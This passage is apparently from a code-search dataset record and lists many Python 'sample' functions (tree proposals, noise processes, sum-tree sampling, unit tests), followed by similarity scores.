{\"color\": \"blue\"}\n\n # plotGraph(G, directory+\"G\"+str(i)+\".eps\")\n # plotGraph(old_G, directory+\"G\"+str(i-1)+\"p.eps\")\n\n # Proposal kernel\n K_st = None\n if len(subtree_nodes) == 1:\n # There might be two possible subtrees so\n # we calculate the probabilities for these explicitly\n K_st = pdf(tree, tree_new, alpha, beta, i)\n else:\n K_st = prob_subtree\n for c in P:\n K_st *= P[c] * neig[c]\n return tree_new, K_st, old_cliques, old_separators, new_cliques, new_separators", "def sample(self, mean, logvar, sample=False):\n if self.training or sample:\n std = torch.exp(0.5*logvar)\n eps = torch.empty(std.size(), device=self.device).normal_()\n return eps.mul(std).add(mean)\n else:\n return mean", "def sample(self, shape=(1,)):\n pass", "def sample(self, num, **kwargs):\n raise NotImplementedError(f'Should be implemented in derived class!')", "def sample(self):\n return self.items[self.np_random.choice(len(self.items))]", "def sample_tree(self):\n logger.info('TreeCatTrainer.sample_tree given %d rows',\n len(self._added_rows))\n SERIES.sample_tree_num_rows.append(len(self._added_rows))\n complete_grid = self._tree.complete_grid\n edge_logits = self.compute_edge_logits()\n assert edge_logits.shape[0] == complete_grid.shape[1]\n assert edge_logits.dtype == np.float32\n edges = self.get_edges()\n edges = sample_tree(complete_grid, edge_logits, edges)\n return edges, edge_logits", "def is_sample(self):\n return self.flags & NODE_IS_SAMPLE", "def sample_qubo(self, Q, **parameters):\n return self.child.sample_qubo(Q, **parameters)", "def sample_uniform(instance, params):\n subpop = np.random.randint(params['N'])\n return sample_from_subpop(instance, params, subpop)", "def sample_uniform():\n global samples_uniform, isample_uniform\n\n # sample of U(0, 1)\n u = samples_uniform[isample_uniform]\n\n # moving to next index of samples global array\n isample_uniform += 1\n if isample_uniform >= len(samples_uniform):\n # exhausted all samples -> re-drawing samples from U(0, 1)\n samples_uniform = np.random.uniform(size=SIZE_SAMPLES_UNIFORM)\n isample_uniform = 0\n\n return u", "def tree_query(self, pta_root):\n self.sul.pre()\n curr_node = pta_root\n\n inputs = []\n outputs = []\n\n while True:\n\n if curr_node.children:\n frequency_sum = sum(curr_node.input_frequencies.values())\n if frequency_sum == 0:\n # uniform sampling in case we have no information\n inp = choice(list(curr_node.children.keys()))\n else:\n # use float random rather than integers to be able to work with non-integer frequency information\n selection_value = random() * frequency_sum\n inp = None\n for i in curr_node.input_frequencies.keys():\n inp = i\n selection_value -= curr_node.input_frequencies[i]\n if selection_value <= 0:\n break\n # curr_node.input_frequencies[inp] -= 1\n\n inputs.append(inp)\n out = self.sul.step(inp)\n new_node = curr_node.get_child(inp, out)\n\n if new_node:\n outputs.append(out)\n curr_node = new_node\n else:\n self.sul.post()\n return\n else:\n curr_node = pta_root\n for i, o in zip(inputs, outputs):\n self.curr_node.input_frequencies[i] -= 1\n curr_node = curr_node.get_child(i, o)\n self.sul.post()\n return", "def test_simpSample(self):\n\n #uniform dist\n ulim = [0,1]\n ufun = lambda x: 1.0/np.diff(ulim)\n\n n = int(1e5)\n usample = statsFun.simpSample(ufun,n,ulim[0],ulim[1])\n self.assertGreaterEqual(usample.min(), ulim[0])\n self.assertLessEqual(usample.max(), ulim[1])\n\n nlim = [-10,10]\n nfun = lambda x: np.exp(-x**2./2.0)/np.sqrt(2.0*np.pi)\n nsample = 
statsFun.simpSample(nfun,n,nlim[0],nlim[1])\n self.assertGreaterEqual(nsample.min(), nlim[0])\n self.assertLessEqual(nsample.min(), nlim[1])\n\n self.assertGreaterEqual(scipy.stats.kstest(usample,'uniform')[1],0.01,'Uniform sample does not look uniform.')\n self.assertGreaterEqual(scipy.stats.kstest(nsample,'norm')[1],0.01,'Normal sample does not look normal.')\n self.assertLessEqual(scipy.stats.kstest(nsample,'uniform')[1],0.01,'Normal sample looks too uniform.')\n self.assertLessEqual(scipy.stats.kstest(usample,'norm')[1],0.01,'Uniform sample looks too normal.')", "def AddSample(self, sample):\n if not isinstance(sample, Sample):\n raise TypeError(\"Sample must be instance of Sample\")\n\n self.samples.append(sample.val)\n\n self.samples.reverse()\n self.samples.pop()\n self.samples.reverse()\n\n filteredValue = sum([a*b for a, b in zip(self.coef, self.samples)])\n\n return Sample(sample.t, filteredValue)", "def add_sample(self, sample: Tuple):\n self.samples.append(sample)\n if len(self.samples) > self.max_memory:\n self.samples.pop(0)", "def sample(self):\n x = self.state\n dx = self.theta * (self.mu - x) + self.sigma * np.array([random.random() for i in range(len(x))])\n # dx = self.theta * (self.mu - x) + self.sigma * np.random.standard_normal(self.size)\n self.state = x + dx\n return self.state", "def sample(self):\r\n x = self.state\r\n dx = self.theta * (self.mu - x) + self.sigma * np.array([random.random() for i in range(len(x))])\r\n self.state = x + dx\r\n return self.state", "def sample_fitness(individual):\n\n return individual.dataframe.sample(frac=0.1, random_state=0).mean().mean()", "def _sample(self, points: Iterable[float]) -> np.array:\n pass", "def sample(self):\n x = self.state\n dx = self.theta * (self.mu - x) + self.sigma * np.array([random.random() for i in range(len(x))])\n self.state = x + dx\n return self.state", "def sample(self):\n x = self.state\n dx = self.theta * (self.mu - x) + self.sigma * np.array([random.random() for i in range(len(x))])\n self.state = x + dx\n return self.state", "def sample(self):\n x = self.state\n dx = self.theta * (self.mu - x) + self.sigma * np.array([random.random() for i in range(len(x))])\n self.state = x + dx\n return self.state", "def sample(self):\n x = self.state\n dx = self.theta * (self.mu - x) + self.sigma * np.array([random.random() for i in range(len(x))])\n self.state = x + dx\n return self.state", "def sample(self):\n x = self.state\n dx = self.theta * (self.mu - x) + self.sigma * np.array([random.random() for i in range(len(x))])\n self.state = x + dx\n return self.state", "def sample(self, x: Union[np.ndarray, float, list], ):\n x = self._sample_test(x)\n if x.ndim <= 1:\n y = 0\n for i in range(self.mixture_count):\n if self.dimensions == 1:\n y += self.weights[i] * self.one_d_normal(x, self.means[i], self.covs[i])\n else:\n y += self.weights[i] * self.multi_d_gauss(x, self.means[i], self.covs[i])\n else:\n x = np.squeeze(x, axis=1)\n y = np.zeros((x.shape[0], ))\n for i in range(self.mixture_count):\n if self.dimensions == 1:\n y += self.weights[i] * self.one_d_normal(x, self.means[i], self.covs[i])\n else:\n y += self.weights[i] * self.multi_d_gauss(x, self.means[i], self.covs[i])\n return y", "def sample(self, like_params):\n\t\traise NotImplementedError", "def test_samples_high_weight_elements_priority(self):\n s = private_sampling.ThresholdSample(\n 0.5, private_sampling.PrioritySamplingMethod)\n s.process(\"a\", 2.0)\n s.process(\"b\", 3.0)\n self.assertCountEqual([\"a\", \"b\"], s.elements.keys())", "def 
samplepoint(x,u):\n return point(x)", "def sample(self):\n x = self.state\n dx = self.theta * (self.mu - x) + self.sigma * np.array(\n [random.random() for i in range(len(x))]\n )\n self.state = x + dx\n return self.state", "def sample(self):\n x = self.state\n dx = self.theta * (self.mu - x) + self.sigma * np.random.rand(*x.shape) \n self.state = x + dx\n return self.state", "def search_tree_sample(variables, formula, samples):\n\n to_use = list(variables)\n used_vars = []\n solns = [None]\n\n while to_use != []:\n next_var = to_use[0]\n to_use = to_use[1:]\n\n solns = black_box_sample(formula, solns, samples, used_vars, next_var)\n used_vars.append(next_var)\n\n return uniform_select(solns)", "def sample(self, n_samples: int) -> torch.Tensor:\n return self.dist.sample((n_samples,))", "def draw_samples_recursively(data: Any) -> Any:\n # if a dictionary return a copy of the dictionary try to sample each value recursively\n if isinstance(data, dict):\n data_dict: dict = data.copy()\n for key in data_dict:\n data_dict[key] = draw_samples_recursively(data_dict[key])\n return data_dict\n\n # if a list return a copy of the list try to sample each element recursively\n if isinstance(data, list):\n data_lst: list = data[:]\n for ii in range(len(data_lst)):\n data_lst[ii] = draw_samples_recursively(data_lst[ii])\n return data_lst\n\n # if a tuple return a copy of the tuple try to sample each element recursively\n if isinstance(data, Tuple):\n data_tuple = tuple(\n (draw_samples_recursively(data[ii]) for ii in range(len(data)))\n )\n return data_tuple\n\n # if ParamSamplerBase, sample a number\n if isinstance(data, ParamSamplerBase):\n data_sampler: ParamSamplerBase = data\n return data_sampler.sample()\n\n # otherwise return the original data\n return data", "def sampleIndex(self):\r\n x=random.random()\r\n i = 0\r\n n = len(self.weights)-1\r\n cummulativeWeight = 0\r\n if len(self.sampledActions) == 0:\r\n explorationWeight = 0\r\n else:\r\n explorationWeight = self.explorationFund / len(self.sampledActions)\r\n if n < 0:\r\n normalizationFactor = self.priorBelief\r\n else:\r\n normalizationFactor = sum(self.weights) + self.explorationFund + \\\r\n self.priorBelief*(1-self.priorTopicDistr.cummulative[n])\r\n while True:\r\n w = self.__getitem__(i)\r\n if i in self.sampledActions:\r\n w += explorationWeight\r\n cummulativeWeight += w\r\n if x <= cummulativeWeight/normalizationFactor:\r\n if i not in self.sampledActions:\r\n self.sampledActions.append(i)\r\n return i\r\n i += 1", "def _builtin_sample_uniform(key, lst, result, database=None, target=None, **kwdargs):\n mode = check_mode((key, lst, result,), ['gLv', 'gLn'], database=database, **kwdargs)\n identifier = '_uniform_%s' % key\n elements, tail = list_elements(lst)\n if len(elements) == 0:\n return []\n else:\n prob = Constant(1 / float(len(elements)))\n results = []\n if mode == 0:\n for i, elem in enumerate(elements):\n elem_identifier = (identifier, i)\n # res = unify_value(result, elem)\n results.append(((key, lst, elem),\n target.add_atom(identifier=elem_identifier, probability=prob,\n group=identifier)))\n else:\n res = None\n for el in elements:\n try:\n res = unify_value(el, result, {})\n break\n except UnifyError:\n pass\n if res is not None:\n results.append(((key, lst, res),\n target.add_atom(identifier=identifier, probability=prob)))\n return results", "def test_find_element(self):\n value = random.choice(self.values)\n exists = self.tree.find(self.tree.root, value)\n self.assertTrue(exists)", "def sample(self, rng_key: 
jnp.ndarray) -> jnp.ndarray:\n pass", "def get_sum(self):\n return self.__tree[0]", "def sample(self, size: int, equal_mode:bool=True):\n\n samples = torch.rand(size, dtype=self.dtype, device=self.tree.device) * self.tree[0]\n if equal_mode:\n offsets = torch.linspace(0, self.tree[0], size+1, device=self.tree.device)[:-1]\n samples /= size\n samples += offsets\n\n idxs = torch.zeros(size, dtype=torch.long, device=self.tree.device)\n\n return self._find(idxs, samples) - self.capacity + 1", "def add(self, sample, **kwargs):\n if not self.samples:\n self.init(sample)\n self.samples.append(sample)", "def sample(self, num_rows=1):\n raise NotImplementedError", "def sample(self, *args, **kwargs):", "def sample(self):\n x = self.state\n dx = self.theta * (self.mu - x) + self.sigma * np.random.randn(len(x))\n self.state = x + dx\n return self.state", "def _get_sample(self):\n p = self._get_mean()\n u = self.random.random_sample(p.shape)\n sample = u < p\n return sample", "def testSampleRichness(self):\n self.tree.calculate_richness()\n self.assertEqual(1167, self.tree.get_species_richness(1))\n self.assertEqual(1171, self.tree.get_species_richness(2))\n self.assertEqual(self.tree.get_species_richness(1), self.tree.get_species_richness(1))\n self.assertEqual(self.tree.get_species_richness(2), self.tree.get_species_richness(2))\n self.assertEqual(self.tree.get_species_richness(3), self.tree.get_species_richness(3))" ]
[ "0.7230191", "0.65261966", "0.63430864", "0.60525787", "0.60525787", "0.60074574", "0.5991044", "0.5952631", "0.59495324", "0.5881766", "0.5785147", "0.57582784", "0.57345945", "0.57001364", "0.5682698", "0.5620183", "0.56149185", "0.56036645", "0.55956614", "0.55863214", "0.55782247", "0.55534893", "0.5546357", "0.5510808", "0.5510808", "0.5510808", "0.5510808", "0.54866934", "0.5479956", "0.5428093", "0.54254204", "0.5417725", "0.5416449", "0.54043347", "0.5391983", "0.5390845", "0.53848636", "0.53837967", "0.5374929", "0.5362213", "0.53620607", "0.53581995", "0.5353865", "0.53319526", "0.5328651", "0.53231806", "0.5317043", "0.530723", "0.53028107", "0.5301612", "0.5287782", "0.52830315", "0.52804863", "0.5273608", "0.5269742", "0.5261463", "0.52566576", "0.5240743", "0.52370507", "0.5236971", "0.5230418", "0.5227923", "0.5227367", "0.5226382", "0.52223635", "0.5218568", "0.521706", "0.52154624", "0.52072364", "0.52017987", "0.51960677", "0.5187484", "0.5182376", "0.5182278", "0.51755005", "0.51755005", "0.51755005", "0.51755005", "0.51755005", "0.517022", "0.5166803", "0.51601845", "0.5152498", "0.5151851", "0.5146634", "0.51432306", "0.5138528", "0.51347935", "0.5131094", "0.5130364", "0.5112995", "0.51011395", "0.50991666", "0.5098058", "0.50816983", "0.5080063", "0.5079074", "0.5073642", "0.5068514", "0.50649583" ]
0.58518076
10
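The `sample` document above walks the tree with a JAX `fori_loop` and an externally defined `step` function that is not shown in the row. A plain-Python sketch of the same proportional descent, continuing the illustrative `FlatSumTree` above rather than reproducing the JAX implementation: draw a value in `[0, total_priority)` and repeatedly step into the child whose cumulative sum covers it.

```python
import random

def sample(tree, query_value=None):
    """Proportional sampling sketch over the illustrative FlatSumTree:
    item i is returned with probability priority[i] / total_priority."""
    total = tree._total_priority()
    if total <= 0.0:
        raise ValueError("Cannot sample from an empty sum tree.")
    u = (random.random() if query_value is None else query_value) * total
    idx = 0
    while idx < tree.low_idx:                   # descend until a leaf is reached
        left = 2 * idx + 1
        if u < tree.nodes[left]:
            idx = left                          # mass falls in the left subtree
        else:
            u -= tree.nodes[left]               # skip the left subtree's mass
            idx = left + 1
    return idx - tree.low_idx                   # leaf index -> item index

# A stratified variant, as in the next record, would typically split [0, 1)
# into `batch_size` equal strata and draw one query_value per stratum, e.g.
# sample(tree, query_value=(k + random.random()) / batch_size) for stratum k.
```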
Performs stratified sampling using the sum tree.
def stratified_sample(self, batch_size, rng): if self._total_priority() == 0.0: raise Exception('Cannot sample from an empty sum tree.') indices = parallel_stratified_sample(rng, self.nodes, np.arange(batch_size), batch_size, self.depth) return np.minimum(indices - self.low_idx, self.highest_set)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def sample(tree, i, alpha=0.5, beta=0.5, only_tree=True):\n # for n in tree.nodes():\n # lab = tuple(n)\n # if len(n) == 1:\n # lab = \"(\" + str(list(n)[0]) + \")\"\n # tree.node[n] = {\"color\": \"black\", \"label\": lab}\n # print tree.nodes()\n\n if only_tree is True:\n tree_new = tree # Alter the input tree\n else:\n #tree_new = tree.subgraph(tree.nodes()) # nx < 2.0\n tree_new = tree.copy() # nx < 2.0\n\n #print(nocopy)\n #old_G = trilearn.graph.junction_tree.get_graph(tree)\n #(subtree, old_separators, probtree) = glib.random_subtree(tree, alpha, beta)\n\n # plotGraph(subtree, directory+\"subtree_\"+str(i)+\".eps\")\n # for n in subtree.nodes():\n # tree_old.node[n] = {\"color\": \"blue\", \"label\": tuple(n)}\n # if n in tree.nodes():\n # tree.node[n] = {\"color\": \"blue\", \"label\": tuple(n)}\n\n # plotGraph(tree_old.subgraph(tree_old.nodes()),\n # directory + \"tree(\" + str(i-1) + \")p.eps\")\n\n (_, subtree_nodes, subtree_edges, subtree_adjlist,\n old_separators, prob_subtree) = ss.random_subtree(tree, alpha, beta, i)\n\n (old_cliques,\n new_cliques,\n new_separators,\n P,\n neig) = sample_cond_on_subtree_nodes(i, tree_new, subtree_nodes, subtree_edges, subtree_adjlist)\n\n if only_tree is True:\n return tree_new\n #conn_nodes = set()\n #for clique in new_cliques:\n # conn_nodes |= clique\n\n # for n in tree.nodes():\n # lab = tuple(n)\n # if len(n) == 1:\n # lab = \"(\"+str(list(n)[0])+\")\"\n # if n in new_cliques:\n # tree.node[n] = {\"color\": \"red\", \"label\": lab}\n # plotGraph(tree.subgraph(tree.nodes()), directory+\"tree(\"+str(i)+\").eps\")\n\n #G = trilearn.graph.junction_tree.get_graph(tree)\n # G.node[i] = {\"color\": \"red\"}\n # for n in old_G:\n # if n in conn_nodes:\n # old_G.node[n] = {\"color\": \"blue\"}\n # G.node[n] = {\"color\": \"blue\"}\n\n # plotGraph(G, directory+\"G\"+str(i)+\".eps\")\n # plotGraph(old_G, directory+\"G\"+str(i-1)+\"p.eps\")\n\n # Proposal kernel\n K_st = None\n if len(subtree_nodes) == 1:\n # There might be two possible subtrees so\n # we calculate the probabilities for these explicitly\n K_st = pdf(tree, tree_new, alpha, beta, i)\n else:\n K_st = prob_subtree\n for c in P:\n K_st *= P[c] * neig[c]\n return tree_new, K_st, old_cliques, old_separators, new_cliques, new_separators", "def uniform_sample(X, y, S, b, d):\n\n\tX['label'] = y\n\n\tW = pd.DataFrame({'group': [1, 1, 0, 0], 'label': [1, 0, 1, 0]})\n\n\t# Calculate weight for each combination of sensitive attribute and class,\n\t# given by the number of examples in each group divided by the number\n\t# that should be in each group if the data were non-discriminatory\n\t# NOTE: Algorithm 4 in the paper actually usees a denominator that appears to be wrong...\n\tweights = [[len(X[X[S] == s]) * len(X[X['label'] == c]) / float(len(X)*0.25) \n\t\t\t\t# / float(len(X) * len(X[(X[S] == s) & (X['label'] == c)])) \\\n\t\t\t\tfor c in [1, 0]] for s in [1, 0]]\n\n\tsizes = [[len(X[(X[S] == s) & (X['label'] == c)]) for c in [1, 0]] for s in [1, 0]]\n\n\tW['weight'] = [i for j in weights for i in j]\n\tW['size'] = [i for j in sizes for i in j]\n\tW = W.assign(num = lambda x: x.size * x.weight)\n\n\t# Divide the data into the four groups based on class/group\n\tdp = X[(X[S] == b) & (X['label'] == d)]\n\tdn = X[(X[S] == b) & (X['label'] != d)]\n\tfp = X[(X[S] != b) & (X['label'] == d)]\n\tfn = X[(X[S] != b) & (X['label'] != d)]\n\n\t# Uniformly sample from each group\n\tdp = dp.sample(n = W.loc[(W['group'] == b) & (W['label'] == d), 'num'].iloc[0].astype(int), replace = True)\n\tdn = 
dn.sample(n = W.loc[(W['group'] == b) & (W['label'] != d), 'num'].iloc[0].astype(int), replace = True)\n\tfp = fp.sample(n = W.loc[(W['group'] != b) & (W['label'] == d), 'num'].iloc[0].astype(int), replace = True)\n\tfn = fn.sample(n = W.loc[(W['group'] != b) & (W['label'] != d), 'num'].iloc[0].astype(int), replace = True)\n\n\tX_prime = pd.concat([dp, dn, fp, fn])\n\tX.drop('label', axis = 1, inplace = True)\n\ty_prime = X_prime['label'].tolist()\n\tX_prime = X_prime.drop('label', axis = 1)\n\n\treturn(X_prime, y_prime)", "def sampling_algorithm(self, X, y):\r\n n_to_sample = self.det_n_to_sample(self.proportion)\r\n\r\n if n_to_sample == 0:\r\n return self.return_copies(X, y, \"Sampling is not needed\")\r\n\r\n X_min = X[y == self.min_label]\r\n X_maj = X[y == self.maj_label]\r\n\r\n # fitting nearest neighbors model to find closest majority points to\r\n # minority samples\r\n nn_params = {**self.nn_params}\r\n nn_params['metric_tensor'] = \\\r\n self.metric_tensor_from_nn_params(nn_params, X, y)\r\n\r\n density = self.calculate_density(X_min, X_maj, nn_params)\r\n\r\n # fitting nearest neighbors model to minority samples to run\r\n # SMOTE-like sampling\r\n n_neighbors = min([len(X_min), self.n_neighbors+1])\r\n nnmt = NearestNeighborsWithMetricTensor(n_neighbors=n_neighbors,\r\n n_jobs=self.n_jobs,\r\n **nn_params)\r\n nnmt.fit(X_min)\r\n ind = nnmt.kneighbors(X_min, return_distance=False)\r\n\r\n samples = self.sample_simplex(X=X_min,\r\n indices=ind,\r\n n_to_sample=n_to_sample,\r\n base_weights=density)\r\n\r\n # do the sampling\r\n #samples = []\r\n #while len(samples) < n_to_sample:\r\n # idx = self.random_state.choice(np.arange(len(density)), p=density)\r\n # random_neighbor_idx = self.random_state.choice(ind[idx][1:])\r\n # X_a = X_min[idx]\r\n # X_b = X_min[random_neighbor_idx]\r\n # samples.append(self.sample_between_points(X_a, X_b))\r\n\r\n return (np.vstack([X, samples]),\r\n np.hstack([y, np.repeat(self.min_label, len(samples))]))", "def _graph_fn_sample_stochastic(distribution):\n return distribution.sample()", "def sampling_algorithm(self, X, y):\r\n\r\n n_to_sample = self.det_n_to_sample(self.proportion)\r\n\r\n if n_to_sample == 0:\r\n return self.return_copies(X, y, \"Sampling is not needed.\")\r\n\r\n # standardization is needed to make the range of the propensity scores\r\n # similar to that of the features\r\n mms = MinMaxScaler()\r\n X_trans = mms.fit_transform(X) # pylint: disable=invalid-name\r\n\r\n X_min = X_trans[y == self.min_label]\r\n\r\n # adding propensity scores as a new feature\r\n X_new = np.column_stack([X_trans, self.propensity_scores(X_trans, y)])\r\n X_min_new = X_new[y == self.min_label] # pylint: disable=invalid-name\r\n\r\n # finding nearest neighbors of minority samples\r\n n_neighbors = min([len(X_new), self.n_neighbors+1])\r\n\r\n ind = self.neighborhood_structure(X_new, y, n_neighbors, X_min_new)\r\n\r\n # noise removal\r\n t_hat = np.sum(y[ind[:, 1:]] == self.min_label, axis=1)\r\n to_remove = np.where(t_hat < self.t * n_neighbors)[0]\r\n\r\n if len(to_remove) >= len(X_min) - 1:\r\n return self.return_copies(X, y,\r\n \"most minority samples indentified as noise\")\r\n\r\n n_to_sample = n_to_sample + to_remove.shape[0]\r\n\r\n samples = self.generate_samples(X_min=X_min,\r\n to_remove=to_remove,\r\n X_trans=X_trans,\r\n y=y,\r\n ind=ind,\r\n n_to_sample=n_to_sample)\r\n\r\n X_min = np.delete(X_min, to_remove, axis=0)\r\n\r\n # do the sampling\r\n #samples = []\r\n #while len(samples) < n_to_sample:\r\n # idx = 
self.random_state.randint(len(X_min))\r\n # # finding the number of minority neighbors\r\n # t_hat = np.sum(y[ind[idx][1:]] == self.min_label)\r\n # if t_hat < self.t*n_neighbors:\r\n # # removing the minority point if the number of minority\r\n # # neighbors is less then the threshold\r\n # # to_remove indexes X_min\r\n # if idx not in to_remove:\r\n # to_remove.append(idx)\r\n # # compensating the removal of the minority point\r\n # n_to_sample = n_to_sample + 1\r\n #\r\n # if len(to_remove) == len(X_min):\r\n # _logger.warning(self.__class__.__name__ + \": \" +\r\n # \"all minority samples identified as noise\")\r\n # return X.copy(), y.copy()\r\n # else:\r\n # # otherwise do the sampling\r\n # X_b = X_trans[self.random_state.choice(ind[idx][1:])]\r\n # samples.append(self.sample_between_points(X_min[idx], X_b))\r\n\r\n return (mms.inverse_transform(np.vstack([X_trans[y == self.maj_label],\r\n X_min,\r\n samples])),\r\n np.hstack([np.repeat(self.maj_label,\r\n np.sum(y == self.maj_label)),\r\n np.repeat(self.min_label, len(X_min)),\r\n np.repeat(self.min_label, len(samples))]))", "def sample(self, seg_logit, seg_label):", "def stratify(self):\n groups = self.group()\n folds = []\n for group in groups:\n folds.append(self.sample(group))\n return [sum([folds[j][i] for j in range(len(folds))], []) \\\n for i in range(self.nfolds)]", "def diverse_sampler(self):\n\n # Sample number of nonzero idxs\n num_idxs = np.random.randint(low=1, high=self.K-1)\n\n # Sample actual idxs in state that are nonzero\n idxs = []\n # can have nonzero terms up to state[K-2]\n all_states = [i for i in range(self.K - 1)]\n for i in range(num_idxs):\n rand_id = np.random.randint(low=0, high=len(all_states))\n idxs.append(all_states.pop(rand_id))\n\n # sort idxs from largest to smallest to allocate\n # potential correctly\n idxs.sort()\n idxs.reverse()\n\n # allocate potential\n xs = self.simplex_sampler(num_idxs)\n\n # fill with appropriate number of pieces adding on any remaindr\n remainder = 0\n state = np.zeros(self.K+1, dtype=int)\n for i in range(num_idxs):\n idx = idxs[i]\n pot_idx = xs[i] + remainder\n num_pieces = int(pot_idx/self.weights[idx])\n state[idx] += num_pieces\n # update remainder\n remainder = pot_idx - num_pieces*self.weights[idx]\n\n return state", "def get_selected_subsamples(sample_func, clusters, trajs_dict, visit_profile, Nsample, false_rate=80):\n print('The desired false rate is %f'%(false_rate/Nsample))\n crter = 0\n done_first_round = False\n nclusters = len(clusters)\n \n print('Start the first selection until the number of potential profiles is more than Nsample')\n while crter < Nsample:\n i = np.random.choice(range(nclusters))\n if len(clusters[i]) > Nsample*5 or len(clusters[i]) < Nsample: continue\n # try sampling\n selected_spl, plist_spl = sample_func(trajs_dict, plist=None, usrs=clusters[i])\n # do the deterministic attack\n a2 = get_trick_mat(clusters[i] , selected_spl, visit_profile)\n nonzero_list = [np.sum(np.count_nonzero(ai))>=1 for ai in make_sym_mat(a2)] \n crter = np.sum(nonzero_list)\n \n print('Finish the first round selection, %d candidates are selected from cluster %d'%(crter, i))\n round_one_usrs = np.array(clusters[i])[nonzero_list]\n \n crter2 = 0; len_rone = len(round_one_usrs)\n print('Start the second selection until false rate %f'%(false_rate/Nsample))\n while crter2 < false_rate:\n final_selected_usrs = round_one_usrs[np.random.choice(len_rone, Nsample, replace=False)]\n tmp = get_trick_mat(final_selected_usrs, selected_spl, visit_profile)\n crter2 = 
np.sum([np.sum(np.count_nonzero(ai))>=1 for ai in make_sym_mat(tmp)])\n print('Final false rate for deterministic attack%f'%(crter2/Nsample))\n return selected_spl, final_selected_usrs, plist_spl", "def eval_sampling_point(self, sampling_point):\n return Solution(self, sampling_point)", "def straight_prune_subsample(neuron, number_of_nodes):\n if(neuron.n_node > 200):\n neuron, distance = straight_subsample_with_fixed_number(neuron, 200)\n sp_neuron, state = prune(neuron=neuron,\n threshold=2*distance,\n lowest_number=number_of_nodes)\n while(~state):\n distance += 1\n sp_neuron = straigh_subsample(neuron, distance)\n sp_neuron, state = prune(neuron=sp_neuron,\n threshold=2*distance,\n lowest_number=number_of_nodes)\n return sp_neuron", "def sample(self):\n return self._root.sample()", "def sow_samples(self, n, combos=None, constants=None, verbosity=1):\n fn_args, cases = self.farmer.gen_cases_fnargs(n, combos)\n self.sow_cases(\n fn_args, cases, constants=constants, verbosity=verbosity\n )", "def Sens_t_sample(poly, dist, samples, rule=\"random\"):\n generator = Saltelli(dist, samples, poly, rule=rule)\n\n dim = len(dist)\n zeros = [0] * dim\n variance = numpy.var(generator[zeros], -1)\n return numpy.array(\n [\n 1\n - numpy.mean(\n (generator[~index] - generator[zeros]) ** 2,\n -1,\n )\n / (2 * numpy.where(variance, variance, 1))\n for index in numpy.eye(dim, dtype=bool)\n ]\n )", "def straight_subsample_with_fixed_number(neuorn, num):\n l = sum(neuorn.distance_from_parent)\n branch_number = len(np.where(neuorn.branch_order[neuorn.n_soma:] == 2))\n distance = l/(num - branch_number)\n neuron = straigh_subsample(distance)\n return distance, neuron", "def GetPhyloSebsequentScore(tree, phenotree, phen_ind, skip=0, with_rand=False, dist_only=False, dist=None):\n population = (len(tree) * 2) - 1\n subscore = np.zeros(tree.genotype.shape[1] - skip)\n node_to_arr = lambda n: np.array(n.genotype.todense().astype(np.int))[0]\n for i, (cur_node, phen_node) in tqdm.tqdm(enumerate(zip(tree.traverse(), phenotree.traverse())),\n total=population, desc='Iterating tree'):\n if not cur_node.is_root():\n if not cur_node.is_leaf() and with_rand and cur_node.random[phen_ind]: continue\n node = node_to_arr(cur_node)\n prev_node = node_to_arr(cur_node.up)\n\n gene_state = node[skip:]\n prev_gene_state = prev_node[skip:]\n\n phen_state = phen_node.genotype[0, phen_ind]\n prev_phen_state = phen_node.up.genotype[0, phen_ind]\n\n subscore += np.abs((1.333 * prev_phen_state * prev_gene_state) +\n (.666 * prev_phen_state * gene_state) +\n (.666 * phen_state * prev_gene_state) +\n (1.333 * phen_state * gene_state) -\n phen_state -\n prev_phen_state -\n gene_state -\n prev_gene_state +\n 1)\n\n if dist_only:\n hist_ = np.histogram(subscore, bins=int(1e7))\n fit_dist = rv_histogram(hist_)\n fit_dist.bin = np.diff(hist_[1]).max()\n return fit_dist\n if dist is not None:\n return dist.sf(subscore)\n else:\n return subscore", "def reset(self):\n self.st = segment_tree.SegmentTreeSampler(self.n, np.ones(self.n) * self.reg, self.random_state)", "def test_generated_sample_distribution(\n jax_dist, sp_dist, params, N_sample=100_000, key=random.PRNGKey(11)\n):\n\n if jax_dist not in [dist.Gumbel]:\n pytest.skip(\n \"{} sampling method taken from upstream, no need to\"\n \"test generated samples.\".format(jax_dist.__name__)\n )\n\n jax_dist = jax_dist(*params)\n if sp_dist and not jax_dist.event_shape and not jax_dist.batch_shape:\n our_samples = jax_dist.sample(key, (N_sample,))\n ks_result = osp.kstest(our_samples, 
sp_dist(*params).cdf)\n assert ks_result.pvalue > 0.05", "def sample(self, k):\n result = \"\"\n current = self.gen_beginning()\n for i in range(0, k):\n result += current[0] + \" \"\n t = tuple(current)\n if t in self.dict:\n c_sum = self.dict[t][self.sum_index]\n rand = random.randint(0, c_sum)\n new_term = \"\"\n for term, count in self.dict.iteritems():\n if rand > count:\n rand -= count\n else:\n new_term = term\n break\n current.remove(current[0])\n current.append(new_term)\n else:\n current = self.gen_beginning()\n return result", "def straigh_subsample(neuorn, distance):\n\n # Selecting the main points: branching nodes and end nodes\n selected_index = get_main_points()\n\n # for each segment between two consecuative main points, a few nodes from the segment will be added to the selected node.\n # These new nodes will be selected base on the fact that neural distance of two consecuative nodes is around 'distance'.\n # Specifically, it starts from the far main point, and goes on the segment toward the near main point. Then the first node which is\n # going to add has the property that it is the farest node from begining on the segment such that its distance from begining is\n # less than 'distance'. The next nodes will be selected similarly.\n\n for i in selected_index:\n upList = np.array([i], dtype = int)\n index = neuorn.parent_index[i]\n dist = neuorn.distance_from_parent[i]\n while(~np.any(selected_index == index)):\n upList = np.append(upList,index)\n index = neuorn.parent_index[index]\n dist = np.append(dist, sum(neuorn.distance_from_parent[upList]))\n dist = np.append(0, dist)\n (I,) = np.where(np.diff(np.floor(dist/distance))>0)\n I = upList[I]\n selected_index = np.append(selected_index, I)\n selected_index = np.unique(selected_index)\n neuron = neuron_with_selected_nodes(selected_index)\n return neuron", "def test_sampling1 ():\n cpus = list(range(C.N_PARALLEL))\n affinity = dict(cuda_idx=C.CUDA_IDX, workers_cpus=cpus)\n agent_ = findOptimalAgent(reward=None)\n agent = CategoricalPgAgent(AcrobotNet, \n initial_model_state_dict=agent_.state_dict())\n s0 = np.array([1, 0, 1/np.sqrt(2), 1/np.sqrt(2), 4, 2], dtype=np.float)\n sampler = SerialSampler(\n EnvCls=rlpyt_make,\n env_kwargs=dict(id=C.ENV, reward=None, internalStateFn=C.INTERNAL_STATE_FN, s0=s0),\n batch_T=500,\n batch_B=16,\n max_decorrelation_steps=0,\n )\n sampler.initialize(\n 